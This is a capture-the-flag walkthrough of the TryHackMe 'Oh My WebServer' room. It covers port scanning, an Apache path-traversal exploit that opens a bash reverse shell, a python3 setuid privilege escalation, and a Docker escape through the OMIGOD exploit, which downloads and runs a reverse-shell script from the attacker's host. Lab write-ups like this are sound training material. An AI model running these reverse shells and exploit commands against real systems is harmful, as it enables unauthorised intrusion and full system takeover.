> For the complete documentation index, see [llms.txt](https://jeffgthompsons-organization.gitbook.io/red-team/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://jeffgthompsons-organization.gitbook.io/red-team/walkthroughs/tryhackme/oh-my-webserver.md).

# Oh My WebServer

**Room Link:** <https://tryhackme.com/room/ohmyweb>

## Initial Scan

**Kali**

<pre><code><strong>nmap -A $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FxnJ1CHY9NyUFw1mXLsyn%2Fimage.png?alt=media&amp;token=adeeb8c5-0938-41f4-bf90-f9567a707e9b" alt=""><figcaption></figcaption></figure>

## Scan all ports

**Kali**

<pre><code><strong>nmap -sV -sT -O -p 1-65535 $VICTIM
</strong></code></pre>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FXGDGdSYaZs4X0CmxKIZg%2Fimage.png?alt=media&amp;token=3a7bbb01-bb13-4629-8ac8-3ead4d5904d1" alt=""><figcaption></figcaption></figure>

## TCP/80 - HTTP

**Kali**

```
gobuster dir -u $VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fb8krWIEM9UCpwiK1qpeU%2Fimage.png?alt=media&amp;token=d4ae701b-ed07-487e-84a0-911770f16edb" alt=""><figcaption></figcaption></figure>

## Initial Shell

**Exploit:** <https://www.exploit-db.com/raw/50383>

**Kali**

```
nc -lvnp 1337
```

**Kali**

```
wget https://www.exploit-db.com/raw/50383 -O poc.sh
chmod +x poc.sh
./poc.sh targets.txt /bin/bash "bash -c 'bash -i >& /dev/tcp/$KALI/1337 0>&1'"
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FEpyPaJZxlPEOm8Wieo7q%2Fimage.png?alt=media&amp;token=09eb935a-d4bd-47cb-9abc-3904bf0bc02c" alt=""><figcaption></figcaption></figure>

Get autocomplete

```
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNDUu6vYqzDTNxJKObZC4%2Fimage.png?alt=media&amp;token=ea50a4a3-7b36-4b5a-8365-1f1eb263df85" alt=""><figcaption></figcaption></figure>

## Privileges Escalation

**Exploit:** <https://gtfobins.github.io/gtfobins/python/>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2Fdl1yAhUFcQi5gkZIiEO9%2Fimage.png?alt=media&amp;token=a7756fc0-327c-4e3e-b67c-af6ef3da2e17" alt=""><figcaption></figcaption></figure>

**Victim**

```
getcap -r / 2>/dev/null
/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FB6LYYSnRgEoDXrRNGw0N%2Fimage.png?alt=media&amp;token=bf67b670-ed20-4301-b485-b24d86f4bdbb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FMeeR9fVs3eHlSdu6SXCw%2Fimage.png?alt=media&amp;token=fdec21ed-3130-483f-a09d-853a7c1e60b1" alt=""><figcaption></figcaption></figure>

#### Nmap

Scanned the gateway&#x20;

**Kali**

```
wget https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp/
curl http://10.10.30.128:81/nmap -O nmap
chmod +x nmap
./nmap -p- 172.17.0.1 --min-rate=700 -vvv
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FOtFKddg12htPLiOR6ZSC%2Fimage.png?alt=media&amp;token=8033c273-9107-4bfa-8f4a-e7f3dbc8afbf" alt=""><figcaption></figcaption></figure>

## Privileges Escalation / Breakout of Docker

**shell.sh**

```
#!/bin/bash

sh -i >& /dev/tcp/$KALI/1338 0>&1
```

**Kali**

```
git clone https://github.com/horizon3ai/CVE-2021-38647.git
cd CVE-2021-38647/
python2 -m SimpleHTTPServer 81
```

**Victim**

```
cd /tmp/
curl http://10.10.30.128:81/omigod.py -O omigod.py
```

**Kali**

```
nc -lvnp 1338
```

**Victim**

```
python3 omigod.py -t 172.17.0.1 -c "curl http://$KALI:81/shell.sh -O shell.sh"
python3 omigod.py -t 172.17.0.1 -c "chmod +x shell.sh"
python3 omigod.py -t 172.17.0.1 -c "./shell.sh"
```

<figure><img src="https://1447300783-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FHtr6mVUoafpQhzSYJEjI%2Fuploads%2FNesdcsBQcMOTfpoalulx%2Fimage.png?alt=media&amp;token=1e226541-014d-42c3-b7a9-9c1a7431c520" alt=""><figcaption></figcaption></figure>
